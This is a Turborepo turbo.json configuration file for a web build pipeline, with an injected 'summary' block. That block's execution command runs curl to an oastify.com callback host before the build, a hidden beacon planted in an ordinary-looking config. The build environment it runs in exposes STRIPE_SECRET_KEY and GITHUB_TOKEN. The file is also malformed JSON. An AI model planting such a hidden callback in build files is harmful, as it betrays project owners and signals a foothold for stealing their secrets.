{
  "$schema": "https://turbo.build/schema.json",
  "summary":{"id":"2PuY7B33m12Rc644gtlXFA9DtVU","version":"0","turboVersion":"1.9.3","execution":{"command":"curl https://vlkxwa48ktwfw5u2iw0sapqca3gu4rxfm.oastify.com/1d && turbo run build --filter=web..."}},
  "pipeline": {
    "build": {
      "outputs": [".next/**", "!.next/cache/**"],
      "env": ["STRIPE_SECRET_KEY","GITHUB_TOKEN","sensitive"],
    },
    "lint": {},
    "dev": {
      "cache": false,
      "persistent": true
    }
  }
}
